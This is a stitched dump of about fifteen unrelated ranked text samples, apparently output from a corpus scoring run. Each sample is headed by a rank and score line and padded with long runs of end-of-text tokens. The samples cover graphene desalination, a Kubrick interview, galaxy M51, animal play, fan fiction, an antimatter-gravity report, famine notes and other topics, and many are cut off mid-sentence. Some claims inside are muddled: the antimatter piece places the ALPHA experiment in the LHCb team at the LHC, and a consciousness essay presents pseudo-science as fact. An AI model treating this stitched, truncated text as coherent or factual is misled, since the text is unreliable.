the growing global demand for potable water. This material works by removing sodium, chlorine and other ions from seawater and other sources. + +Dr. Ray Johnson, senior vice president and chief technology officer: "Access to clean drinking water is going to become more critical as the global population continues to grow, and we believe that this simple and affordable solution will be a game-changer for the industry. Perforene... is just one example of Lockheed Martin's efforts to apply some of the advanced materials that we have developed for our core markets, including aircraft and spacecraft, to global environmental and economic challenges." + +According to a UN report last year, over 780 million people around the world do not have access to clean drinking water. Tom Notaro, Lockheed business manager for advanced materials: "One of the areas that we're very concerned about in terms of global security is the access to clean and affordable drinking water. As more and more countries become more developed... access to that water for their daily lives is becoming more and more critical." + +Perforene was developed by placing holes that are one nanometre or less in a membrane of graphene. These are small enough to trap ions while dramatically improving the flow-through of water molecules, reducing clogging and pressure. Being just one atom thick, graphene is both strong and durable, making it far more effective at sea water desalination at a fraction of the cost of traditional reverse osmosis systems. + +John Stetson, senior engineer: "It's 500 times thinner than the best filter on the market today and 1,000 times stronger. The energy that's required and the pressure that's required to filter salt is approximately 100 times less." + +In addition to desalination, the Perforene membrane can be tailored to other applications – including capturing minerals, through the selection of the size of hole placed in the material to filter or capture a specific size particle of interest. Lockheed Martin has also been developing processes that will allow the material to be produced at scale. The company is now seeking commercialisation partners. + +A desalination plant in Dubai, United Arab Emirates + +Comments »<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 81; Score = 643072.0 +<|begin_of_text|>Besides being one of the finest filmmakers of all time and mastermind of the greatest movie never made, Stanley Kubrick (July 26, 1928–March 7, 1999) was also a keen observer of culture with ceaseless curiosity about the human condition, dancing between the hopeless and the heartening. From Stanley Kubrick: Interviews (public library) comes this layered meditation on purpose, mortality, and, as Carl Jung once put it, the art of “kindl[ing] a light in the darkness of mere being,” from a 1968 Playboy interview by Eric Nordern: + +Playboy: Thanks to those special effects, 2001 is undoubtedly the most graphic depiction of space flight in the history of films — and yet you have admitted that you yourself refuse to fly, even in a commercial jet liner. Why? + +Kubrick: I suppose it comes down to a rather awesome awareness of mortality. Our ability, unlike the other animals, to conceptualize our own end creates tremendous psychic strains within us; whether we like to admit it or not, in each man’s chest a tiny ferret of fear at this ultimate knowledge gnaws away at his ego and his sense of purpose. We’re fortunate, in a way, that our body, and the fulfillment of its needs and functions, plays such an imperative role in our lives; this physical shell creates a buffer between us and the mind-paralyzing realization that only a few years of existence separate birth from death. If man really sat back and thought about his impending termination, and his terrifying insignificance and aloneness in the cosmos, he would surely go mad, or succumb to a numbing sense of futility. Why, he might ask himself, should he bother to write a great symphony, or strive to make a living, or even to love another, when he is no more than a momentary microbe on a dust mote whirling through the unimaginable immensity of space? + +Those of us who are forced by their own sensibilities to view their lives in this perspective — who recognize that there is no purpose they can comprehend and that amidst a countless myriad of stars their existence goes unknown and unchronicled — can fall prey all too easily to the ultimate anomie….But even for those who lack the sensitivity to more than vaguely comprehend their transience and their triviality, this inchoate awareness robs life of meaning and purpose; it’s why ‘the mass of men lead lives of quiet desperation,’ why so many +================================================================================ +Rank = 82; Score = 643072.0 +<|begin_of_text|>Astronomy Picture of the Day Discover the cosmos! Each day a different image or photograph of our fascinating universe is featured, along with a brief explanation written by a professional astronomer. 2010 June 11 + +Hydrogen in M51 + +Credit & Copyright: CAHA, Descubre Foundation, DSA, OAUV, Vicent Peris (OAUV / PixInsight), Jack Harvey (SSRO), + +Steven Mazlin (SSRO), Carlos Sonnenstein (Valkanik), Juan Conejero (PixInsight). + +Explanation: Perhaps the original spiral nebula, M51 is a large galaxy, over 60,000 light-years across, with a readily apparent spiral structure. Also cataloged as NGC 5194, M51 is a part of a well-known interacting galaxy pair, its spiral arms and dust lanes clearly sweeping in front of companion galaxy NGC 5195 (top). This dramatically processed color composite combines M51 image data from the Calar Alto Observatory's 1.2 meter telescope. The data include long exposures through a narrow hydrogen alpha filter that trace emission from atomic hydrogen. Reddish hydrogen emission regions, called HII regions, are the regions of intense star formation seen to lie mainly along M51's bright spiral arms. Intriguingly, this composite also shows red hydrogen emission structures in the faint features extending even beyond NGC 5195, toward the top of the frame.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 83; Score = 634880.0 +<|begin_of_text|>Recess + +Fish, reptiles, and even some invertebrates appear to play. But when is it play, and not something else? And why do animals do it? + +During a visit to the National Zoo in Washington, DC, biopsychologist Gordon Burghardt decided to peek in on a Nile soft-shelled turtle its keepers affectionately called “Pigface.” Pigface had been a zoo resident for more than 50 years, and Burghardt had seen him before, but this time, he noticed something a bit curious—Pigface was playing basketball. + +“It was by itself,” recalls Burghardt, currently at the University of Tennessee in Knoxville, and “it had started to knock around” a basketball provided by its keepers. The year was 1994, and play had only rarely and anecdotally been reported in animals other than mammals, but he thought that might be what Pigface was doing. The 1-meter-long turtle exuberantly pushed the ball around its aquatic enclosure, swimming through the water with ease as it batted the ball in front of it with its nose. “If you saw a dog or an otter going around batting a ball, bouncing around and chasing it, and going back and forth and doing it over and over again, we’d have no problem calling it play,” he says. “And that’s what the turtle was doing.” + +More recently, ethologist Jennifer Mather of the University of Lethbridge in Canada learned that two of her octopus research subjects had repeatedly blown jet streams of water at floating empty pill bottles, shooting them across the surface of their tanks at the Seattle Aquarium. “If you give an [octopus] something new, it will grab it in its arms and bring it up to its mouth, probably exploring it chemically,” she says. This would usually happen a couple of times, she adds, until it “knew what it was, and didn’t bother anymore. But these two, it’s like they suddenly thought, ‘Maybe I can do something with this.’ ” + +For Burghardt and Mather and most researchers who have witnessed such bizarre activities in reptiles, fish, and even invertebrates, it is clear that these animals engage in some form of play. But not everyone is convinced. “I personally doubt it,” says behavioral physiologist Bernd Heinrich of the University of Vermont. “I personally have never seen anything I’d call ‘play’ in turtles and was +================================================================================ +Rank = 84; Score = 630784.0 +<|begin_of_text|>The high as fuck guard wasn't on the gate when I left, so I headed in the general direction of downtown San Cimarron without hanging around. I know they told me not to go straight there, but I didn't feel like having to navigate this dump when it started getting really hot. I couldn't really bolt without shaking the toaster on my arm loose anyway, so the reasons to beeline outweighed those not to. + +The walk gave me some time to think. My mind immediately turned to shower thoughts about the area. How many ponies were living in the San Cimarron area? Surely a desert settlement would have serious challenges with water, particularly considering that in a post-balefire landscape, there wouldn't be many living cacti. The Rangers probably had stuff like condensers and the tools for drilling down to the water table, the Enclave could have clouds shipped in or something, and Los Arabos had the ability to strip hydrogen and oxygen straight from rocks or something for all I knew. But the local settlements would have some real problems. + +After a half-built housing project, the shell of a community college, another U-235, and an ostentatious glass-roofed shopping mall that looked like it was in decline even before the world ended, my thoughts had ended up on, like, how pretty much any music you can think of can be improved by the addition of a brass section. Don't ask me how I got there from plumbing logistics, I haven't a fucking clue. Point is, this is the part where I started... what is it. Humming? Scatting? That thing where you're making noises along to a tune, but it's definitely not singing. That thing. I started being really loud, and the slapback of that echoing around whatever shitty single-storey commercial block I was in stunned me to attention. + +I stanced wide and looked around. The noise faded back to nothing. Not even a gust of wind or a creak of crappy old buildings. I checked my map. This thing had no fancy EFS or SATS to play with, which is just as well because I'd probably get distracted queuing up pokes on Rainbow or something - I was reorienting myself because I'd been walking on autopilot for a while. The sun was still low enough to be casting significant shadows, and I'd veered a little off course, but I was still closer to Isotope City than Roswhinny. This was when +================================================================================ +Rank = 85; Score = 622592.0 +<|begin_of_text|>Electroactive polymers have been studied for actuation applications over the past few decades, but the stress generation ability of polymers has remained low, generally because of their low Young’s modulus, though mechanical performance as well as work density at low rates can be increased by incorporating carbon nanotubes into conjugated polymers16. Recent studies of Au-Pt nanoporous metal actuators have revealed exceptionally high strains15, but such high strains were achieved at relatively low frequencies (0.00025 Hz) and such actuator materials are expensive. The use of abundant materials such as metallic NiOOH and V 2 O 5 fibres can mitigate the cost of metallic actuators17,18, though the performance of these particular actuators depends on the crystallographic orientation of the material. See Extended Data Table 1 for a literature survey of actuator performance. + +In this study, we report a macroscopic actuation device, the mechanism of which is the electrochemically induced insertion and removal of cations between two-dimensional (2D) nanosheets of 1T MoS 2 (see Extended Data Fig. 1; applied voltage from +0.3 V to -0.3 V is required for removal and insertion of cations). Two-dimensional materials such as MoS 2 nanosheets have high surface to volume ratios, enabling large amounts of electrochemical charge storage. The stored electrochemical charge—which affects the interatomic bonds and the distance between atoms via double-layer formation1,19, ion intercalation11 or Faradaic reaction17—reconfigures the space-charge region in the vicinity of the electrode–electrolyte interface. The use of this sort of intercalation mechanism to induce expansion has previously been demonstrated in graphite battery electrodes; under a pre-stress loading of 10 MPa, strain and energy density values of 6.7% and 670 kJ m−3, respectively, were achieved in electrochemical cells comprising LiCoO 2 cathodes and bulk micromachined highly oriented pyrolytic graphite anodes. Expansion occurred because of synergistic expansion of both the cathode and the anode during delithiation and lithiation, respectively11, giving an energy density of 1.3 MJ m−3 and strain values of 1.8% under 100 MPa applied load, along with strains of 1% at frequencies of 6.7 mHz under 2 MPa loading in a fully packaged 740 +================================================================================ +Rank = 86; Score = 622592.0 +<|begin_of_text|>When I was a teenager, the three-year-old boy from next door came visiting with his insatiable curiosity about life. + +“Why is there clouds?” + +“So it can rain.” + +“Why is there rain?” + +“Because all these plants are thirsty.” + +“But why are they thirsty?” + +Etcetera. The why never stopped. + +I would have done better with how – I had a thing for science at the time. But even so, science runs out of answers, because it has turned its back on the most fundamental of all forces. + +Consciousness. + +Science is like a boy trying to light a fire. Up until mid-nineteenth century the boy had only one piece of kindling – the fundamental force of gravity. Then the boy found the electromagnetic force, and after that the strong and weak nuclear forces. Four pieces. So, science improved its ability to describe how the fire (the universe) should work. + +But still no fire. It’s missing something. The world’s most famous living physicist, Stephen Hawking agrees. He says, “What is it that breathes fire into the equations and makes a universe for them to describe?” + +It’s consciousness. + +Consciousness is the breath that generates the four fundamental forces and every object in the universe. All humans, animals, birds, plants, minerals and even the air molecules that passes through your lungs are a projection of consciousness and have their own levels of awareness. + +Consciousness is the breath that maintains the shape of your body, taking in elements of the earth to make new cells, replace the old and returning their elements to the earth. You replace your entire body at least once every two years, until you lay it down and move on. + +Consciousness is the breath science must use if it wants to throw a full light on the universe. So far it has refused, because the great drama of consciousness is subjective. But then the whole universe is literally a subjective experience. There is no objective universe to discover. + +When science folds consciousness into its view of the universe, it will grow. It will know the why of existence as well as the how. Then – maybe – it will tackle the Five Universal Truths of existence. + +I'd love it if you'd tell your friends about this article: Facebook + +Email + +Reddit + +StumbleUpon + +Google + +Pinterest<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 87; Score = 618496.0 +<|begin_of_text|>normative form of the English language + +Standard English (SE, also standardized English) is the dialect of English language that is used as the national norm—the standard language—in an English-speaking country, especially as the language for public and formal usage.[1] In England and Wales, the term standard English is associated with British English, the Received Pronunciation accent, and the United Kingdom Standard English (UKSE) grammar and vocabulary. In Scotland, the standard dialect is Scottish Standard English; in the United States, General American is the standard variety spoken in that country; and in Australia, the national standard is called General Australian English.[2] + +Definitions [ edit ] + +Although a standard English is generally the most formal version of the language, a range of registers exists within any standardized English, as is often seen when comparing a newspaper article with an academic paper, for example. A distinction also may be drawn between spoken and written usage. Spoken dialects are looser than their written counterparts, and quicker to accept new grammatical forms and vocabulary. The various geographical varieties form a generally accepted set of rules, often those established by grammarians of the 18th century.[3] + +English originated in England during the Anglo-Saxon period, and is now spoken as a first or second language in many countries of the world, many of which have developed one or more "national standards" (though this does not refer to published standards documents, but to frequency of consistent usage). English is the first language of the majority of the population in a number of countries, including the United Kingdom, the United States, Canada, Ireland, Australia, New Zealand, Jamaica, Trinidad and Tobago, the Bahamas and Barbados and is an official language in many others, including; India, Pakistan, the Philippines, South Africa and Nigeria. + +As the result of colonisation and historical migrations of English-speaking populations, and the predominant use of English as the international language of trade and commerce (a lingua franca), English has also become the most widely used second language.[4] In countries where English is neither a native language nor widely spoken, a non-native variant (typically English English or North American English) might be considered "standard" for teaching purposes.[5] In some areas a pidgin or creole language, blends English with one or more native languages. + +Grammar [ edit ] + +Although the standard Englishes of the various anglophone countries are very similar, often there are minor grammatical differences between them, as well as numerous vocabulary divergences. In American and Australian +================================================================================ +Rank = 88; Score = 610304.0 +<|begin_of_text|>Einstein's'spooky action' common in large quantum systems + +by Staff Writers + +Cleveland OH (SPX) May 29, 2013 + +Entanglement is a property in quantum mechanics that seemed so unbelievable and so lacking in detail that, 66 years ago this spring, Einstein called it "spooky action at a distance." + +But a mathematician at Case Western Reserve University and two of his recent PhD graduates show entanglement is actually prevalent in large quantum systems and have identified the threshold at which it occurs. + +The finding holds promise for the ongoing push to understand and take advantage of the property. If harnessed, entanglement could yield super high-speed communications, hack-proof encryptions and quantum computers so fast and powerful they would make today's supercomputers look like adding machines in comparison. + +The mathematicians don't tell us how entanglement works, but were able to put parameters on the property by combining math concepts developed for a number of different applications during the last five decades. In a nutshell, the researchers connected the math to properties of quantum mechanics-the otherworldly rules that best apply to atomic and subatomic particles-to describe physical reality. + +"There have been indications that large subgroups within quantum systems are entangled," said Stanislaw Szarek, mathematics professor at Case Western Reserve and an author of the study. "Our contribution is to find out exactly when entanglement becomes ubiquitous." + +Szarek worked with Guillaume Aubrun, assistant professor of mathematics at Universite Claude Bernard Lyon 1, France, and Deping Ye, assistant professor of mathematics and statistics at Memorial University of Newfoundland, Canada. Their work is published online in the Early View section of Communications on Pure and Applied Mathematics. + +The behaviors of materials down at the level of atoms are often strange, but entanglement borders on our concepts of sorcery. For example, if two electrons spinning in opposite directions are entangled, when one changes direction, the other immediately changes, whether the electrons are side by side, across the room or at opposite ends of the universe. + +Other particles, such as photons, atoms and molecules, can also become entangled, but taking advantage of the property requires more than a pair or handful. + +Szarek, Aubrun and Ye focused on large quantum systems-large groups of particles that have the potential for use in our world. + +They found that, in systems in a random state, two subsystems that are each less than one-fifth of the whole are generally not entangled. Two +================================================================================ +Rank = 89; Score = 606208.0 +<|begin_of_text|>Rand Paul is the junior US senator from Kentucky. He serves on the Foreign Relations Committee and the Homeland Security and Governmental Affairs Committee. The views expressed in this commentary are his own. + +(CNN) Recently, Senators John McCain and Lindsey Graham predictably but mistakenly called for greater United States military involvement in the Syrian civil war, proving they have learned nothing from our history in the Middle East. + +It seems that every dictator and every atrocity in that region is met with a call for action without a thought to consequences. Those who wish to send our soldiers to "take care" of every atrocity in the world might want to take a glance at Maplecroft's Human Rights Risk Atlas, which currently lists 35 countries as extreme risks for committing atrocities. Are we prepared to send our military to right the wrongs of all 35 countries? + +Of course, Americans were horrified by the use of chemical weapons in Syria on innocent people. But there are horrors all around the world, and surely the suggestion is not that we battle them all. + +United States military action is not to be taken lightly. It should be thoughtful, measured, constitutional -- and decisive for a victory. For over two decades, we have acted as a traffic cop in the Middle East -- sanctions, bombings, no-fly zones, invasions, occupations, policing, nation-building. + +American foreign policy now requires a dramatic shift. It must be governed by the question: What are our vital national security interests in the region? + +President Trump was elected in no small measure because he castigated the previous administration for the disastrous and destabilizing Iraq War. He lampooned the Obama/Clinton decision to bomb Libya and send it into chaos. And Trump warned, rightfully, that Syria was a quagmire, ripe with opportunities for mistakes and catastrophic consequences to world peace. + +For years, I have argued against intervention in the Syrian civil war, and I have done so under both Democrat and Republican presidents. + +It isn't that there aren't atrocities. There are -- and on both sides of the war. But sometimes discerning the good guys from the bad is not possible. Sometimes, there is no good side in war. + +JUST WATCHED Paul: 'Stupidity' preventing a Syria solution Replay More Videos... MUST WATCH Paul: 'Stupidity' preventing a Syria solution 00:58 + +Assad, like so many strong hands in the Middle East, is an autocrat and likely much worse. But some of the armies that fight him and seek his ouster are +================================================================================ +Rank = 90; Score = 602112.0 +<|begin_of_text|>European scientists are currently trying to collect enough antimatter to determine if the elusive substance reacts to gravity in the opposite way that normal matter does—by "falling up" instead of down. + +Anti-gravity has long been a staple of science fiction as a future technological means for propelling spacecraft away from massive objects like planets and stars? But does it really exist in nature? + +Scientists working on the Antihydrogen Laser Physics Apparatus (Alpha) experiment at CERN's Large Hadron Collider (LHC) in Switzerland aim to find out, according to reports. They theorize that antimatter, made up of antiparticles which possess an opposite electrical charge and quantum spin to normal particles, could also be repelled by ordinary matter instead of being attracted to it. + +Writing in the latest issue of Nature Communications, the Alpha experiment scientists from the LHCb team note that "there are many indirect indications that no such differences exist" in how matter and antimatter interacts with gravity. But they also suggest that the new wealth of data the experiment has collected on antihydrogen particles is worth looking through to check if anti-gravity does exist, while proposing a way to do that. + +"[T]here have been no direct, free-fall style, experimental tests of gravity on antimatter. Here we describe a novel direct test methodology; we search for a propensity for antihydrogen atoms to fall downward when released from the Alpha antihydrogen trap. In the absence of systematic errors, we can reject ratios of the gravitational to inertial mass of antihydrogen >75 at a statistical significance level of 5 percent; worst-case systematic errors increase the minimum rejection ratio to 110. A similar search places somewhat tighter bounds on a negative gravitational mass, that is, on antigravity. This methodology, coupled with ongoing experimental improvements, should allow us to bound the ratio within the more interesting near equivalence regime," the researchers write. + +The LHCb research team is now prying into other mysteries of antimatter such as the rates at which exotic particles decay into either matter or antimatter, according to BBC News. Scientists last week were able to determine "a slight difference in the decay of particles called Bs mesons," BBC News reported. + +But one big hurdle in this research is that producing antiparticles is difficult—and keeping them around for any length of time is even tougher. + +The universe contains plenty of normal matter but just trace amounts of antimatter. When normal particles and antiparticles collide they destroy each other +================================================================================ +Rank = 91; Score = 602112.0 +<|begin_of_text|>Several fundamental ideas in calculus are more than 2000 years old. As a formal subdiscipline of mathematics, calculus was first introduced and developed in the late 1600s, with key independent contributions from Sir Isaac Newton and Gottfried Wilhelm Leibniz. Mathematicians agree that the subject has been understood rigorously since the work of Augustin Louis Cauchy and Karl Weierstrass in the mid 1800s when the field of modern analysis was developed, in part to make sense of the infinitely small quantities on which calculus rests. Hence, as a body of knowledge calculus has been completely understood by experts for at least 150 years. The discipline is one of our great human intellectual achievements: among many spectacular ideas, calculus models how objects fall under the forces of gravity and wind resistance, explains how to compute areas and volumes of interesting shapes, enables us to work rigorously with infinitely small and infinitely large quantities, and connects the varying rates at which quantities change to the total change in the quantities themselves.While each author of a calculus textbook certainly offers her own creative perspective on the subject, it is hardly the case that many of the ideas she presents are new. Indeed, the mathematics community broadly agrees on what the main ideas of calculus are, as well as their justification and their importance; the core parts of nearly all calculus textbooks are very similar. As such, it is our opinion that in the 21st century – an age where the internet permits seamless and immediate transmission of information – no one should be required to purchase a calculus text to read, to use for a class, or to find a coherent collection of problems to solve. Calculus belongs to humankind, not any individual author or publishing company. Thus, the main purpose of this work is to present a new calculus text that is free. In addition, instructors who are looking for a calculus text should have the opportunity to download the source files and make modifications that they see fit; thus this text is open-source. Since August 2013, Active Calculus has been endorsed by the American Institute of Mathematics and its Open Textbook Initiative<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 92; Score = 593920.0 +<|begin_of_text|>You seem to have disabled JavaScript. You should really enable it for this site but most things should work without it. + +Malnutrition is a condition resulting from a dietary deficiency, such as a lack of access to a specific nutrient or due to a lack of access to food in general. + +Undernourishment is simply when people consume too little food over a certain period of time. + +Famine + +Causes + +Drought - A lack of rainfall leads to a lack of water in the water table for plants. This can result in crops failing and the death of livestock, leading to food shortages, primarily for subsistence farmers, but in more extreme cases whole countries. + +Disease - A spread of disease through crops can quickly eliminate a years harvest leading to mass famine. + +Population Increase - If the population of an area increases too quickly, perhaps due to an influx of refugees, the food supplies may not be able to scale to the demand, leading to a famine. + +Cost - When the quantity of available food and livestock falls, the demand and hence cost of food increases. As food prices inflate, people become unable to afford food and begin to starve. + +Famine in Ethiopia + +Location + +Ethiopia itself is located in the east of Africa to the south of the country of Eritrea, north of Kenya. The area is landlocked due to Eritrea splitting off during a civil war. The areas affected by the civil war include Eritrea and Tiya, where the civil war has been taking place. Refugees from the civil war in these areas have fled to Koram, which hosted the majority of the famished during a famine in 1984. More recently, a drought in Ethiopia has led to famine in Gode, in the south of Ethiopia. + +When + +The initial famines due to civil war and drought were in 1984 - 1985. + +Famines occurred again in 2000 due to drought. + +Causes + +In all cases, drought led to the failure of crops which resulted in famines. In 2000 and 1984-1985 there had been poor rainfall for 3 years. This causes crops to fail and also forced herdsman to slaughter their cattle. The slaughtering of cattle was unusual, since the cattle are generally used for milking, not for meat. + +The lack of rain was due to cooler sea temperatures in the Atlantic & Pacific, so less evaporation occurred and hence less rain fell. + +A civil war between Ethiopia and Eritrea had been waged for several years +================================================================================ +Rank = 93; Score = 593920.0 +<|begin_of_text|>When I was kidnapped by Muslim insurgents in Iraq in 2004, they wanted one thing. They wanted to know how the Western media worked. + +It was a carjacking. Just outside my hotel in Baghdad. One car in front, one behind the vehicle in which I was travelling. They waited until we were out of sight of the Australian-manned checkpoint across the road. Then they struck. + +The car in front stopped, blocking our way forward; the car behind blocked our way back. Armed men leapt out of both vehicles. They were dressed like normal Iraqi civilians. Bad shirts, short beards. But they had guns. + +I tried to hold the door shut but as they wrenched it open the handle broke off in my hand. Then they were in the car, putting guns to my head. I had one thought at that moment: I am dead. + +I fought the guy who got in the back seat. I had his pistol in a grip with both hands and forced it into his groin. He was strong and I remember yelling at my driver to reverse and ram the car blocking the road behind us. He couldn’t; another insurgent was holding a gun to his head and he drove forward as they told him. + +I was trying to get my finger on the trigger, to shoot the insurgent beside me in the groin. As we started to drive, I yelled out the window at an Iraqi police checkpoint. I lost my grip on the handgun and that was it. + +They are pushing the pornographic limits of their violence. It is about maintaining the attention of the West. It is cynical. And it is effective. + +An American convoy went past as we drove out to insurgent-controlled western Baghdad. The man next to me saw my eyes and clamped his arm across me. He knew what I was thinking. But the calculus was this: If I run now will the Yanks shoot me before these guys do? The moment passed. I was in their control. + +The men who kidnapped me did not want to kill me, although I didn’t know that yet. What they wanted to know was how to pierce the Western news cycle. + +Tied up and blindfolded, I explained to them my role as a freelancer, working for SBS. I explained my previous role as a reporter for wire services including Associated Press. I had a reasonably good understanding of how the international press were operating in Iraq then. Even though the war was a big story by 2004, only the big news organisations had permanent staff there +================================================================================ +Rank = 94; Score = 589824.0 +<|begin_of_text|>Mass and Weight are two often misused and misunderstood terms in mechanics and fluid mechanics. + +The fundamental relation between mass and weight is defined by Newton's Second Law. Newton's Second Law can be expressed as + +F = m a (1) where F = force (N, lb f ) m = mass (kg, slugs) a = acceleration (m/s2, ft/s2) + +Mass + +Mass is a measure of the amount of material in an object, being directly related to the number and type of atoms present in the object. Mass does not change with a body's position, movement or alteration of its shape, unless material is added or removed. + +an object with mass 1 kg on earth would have the same mass of 1 kg on the moon + +Mass is a fundamental property of an object, a numerical measure of its inertia and a fundamental measure of the amount of matter in the object. + +Weight + +Weight is the gravitational force acting on a body mass. The generic expression of Newton's Second Law (1) can be transformed to express weight as a force by replacing the acceleration - a - with the acceleration of gravity - g - as + +F g = m a g (2) where F g = gravitational force - or weight (N, lb f ) m = mass (kg, slugs) a g = acceleration of gravity on earth (9.81 m/s2, 32.17405 ft/s2) + +Example - The Weight of a Body on Earth vs. Moon + +The acceleration of gravity on the moon is approximately 1/6 of the acceleration of gravity on the earth. The weight of a body with mass 1 kg on the earth can be calculated as + +F g_ earth = (1 kg) (9.81 m/s2) + += 9.81 N + +The weight of the same body on the moon can be calculated as + +F g_ moon = (1 kg) ((9.81 m/s2) / 6) + += 1.64 N + +The handling of mass and weight depends on the systems of units used. The most common unit systems are + +the International System - SI + +the British Gravitational System - BG + +the English Engineering System - EE + +One newton is + +≈ the weight of one hundred grams - 101.972 gf (g F ) or 0.101972 kgf (kg F or kilopond - kp (pondus is latin for weight)) + +) or 0.101972 kgf ( +================================================================================ +Rank = 95; Score = 581632.0 +<|begin_of_text|>Image caption Double trouble for dinosaurs: Did more than one asteroid or comet strike cause their demise? + +The dinosaurs were wiped out 65 million years ago by at least two space impacts, rather than a single strike, a new study suggests. + +Previously, scientists had identified a huge impact crater in the Gulf of Mexico as the event that spelled doom for the dinosaurs. + +Now evidence for a second impact in Ukraine has been uncovered. + +This raises the possibility that the Earth may have been bombarded by a whole shower of space rocks. + +The new findings are published in the journal Geology by a team lead by Professor David Jolley of Aberdeen University, UK. + +When first proposed in 1980, the idea that an asteroid or comet impact had killed off the dinosaurs proved hugely controversial. Later, the discovery of the Chicxulub Crater in the Gulf of Mexico was hailed as "the smoking gun" that confirmed the theory. + +Double trouble + +The discovery of a second impact crater suggests that the dinosaurs were driven to extinction by a "double whammy" rather than a single strike. + +The Boltysh Crater in Ukraine was first reported in 2002. However, until now it 